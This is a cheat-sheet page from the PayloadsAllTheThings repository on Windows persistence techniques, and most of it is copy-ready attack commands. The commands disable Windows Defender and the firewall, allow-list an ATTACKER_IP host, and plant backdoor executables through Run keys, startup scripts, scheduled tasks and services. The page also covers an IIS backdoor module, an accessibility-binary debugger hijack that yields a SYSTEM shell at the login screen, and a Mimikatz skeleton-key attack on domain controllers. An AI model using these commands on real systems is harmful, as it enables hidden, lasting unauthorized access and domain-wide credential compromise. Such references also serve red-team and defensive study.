PayloadsAllTheThings/Methodology and Resources/Windows - Persistence.md

Windows - Persistence

Summary

• Tools
• Disable Windows Defender
• Disable Windows Firewall
• Userland
  • Registry
  • Startup
  • Scheduled Task
• Serviceland
  • IIS
  • Windows Service
• Elevated
  • HKLM
  • Services
  • Scheduled Task
  • Binary Replacement
    • Binary Replacement on Windows XP+
    • Binary Replacement on Windows 10+
  • RDP Backdoor
    • utilman.exe
    • sethc.exe
  • Skeleton Key
• References

Tools

• SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r

Disable Windows Defender

sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true

Disable Windows Firewall

Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off

# ip whitelisting
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

Userland

Set a file as hidden

attrib +h c:\autoexec.bat

Registry

Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.

Value name:  Backdoor
Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe

Using SharPersist

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add

Startup

Create a batch script in the user startup folder.

PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe

Using SharPersist

SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

Scheduled Task

PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

Using SharPersist

# Add to a current scheduled task
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

# Add new task
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly

Serviceland

IIS

IIS Raid – Backdooring IIS Using Native Modules

$ git clone https://github.com/0x09AL/IIS-Raid
$ python iis_controller.py --url http://192.168.1.11/ --password SIMPLEPASS
C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module Name /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true

Windows Service

Using SharPersist

SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add

Elevated

HKLM

Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.

Value name:  Backdoor
Value data:  C:\Windows\Temp\backdoor.exe

Services

Create a service that will start automatically or on-demand.

PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."

Scheduled Tasks

Scheduled Task to run as SYSTEM, everyday at 9am.

PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

Binary Replacement

Binary Replacement on Windows XP+

Feature	Executable
Sticky Keys	C:\Windows\System32\sethc.exe
Accessibility Menu	C:\Windows\System32\utilman.exe
On-Screen Keyboard	C:\Windows\System32\osk.exe
Magnifier	C:\Windows\System32\Magnify.exe
Narrator	C:\Windows\System32\Narrator.exe
Display Switcher	C:\Windows\System32\DisplaySwitch.exe
App Switcher	C:\Windows\System32\AtBroker.exe

Binary Replacement on Windows 10+

Exploit a DLL hijacking vulnerability in the On-Screen Keyboard osk.exe executable.

Create a malicious HID.dll in C:\Program Files\Common Files\microsoft shared\ink\HID.dll.

RDP Backdoor

utilman.exe

At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

sethc.exe

Hit F5 a bunch of times when you are at the RDP login screen.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

Skeleton Key

# Exploitation Command runned as DA:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DCs FQDN>

# Access using the password "mimikatz"
Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator

References

• A view of persistence - Rastamouse
• Windows Persistence Commands - Pwn Wiki
• SharPersist Windows Persistence Toolkit in C - Brett Hawkins
• IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020
• Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa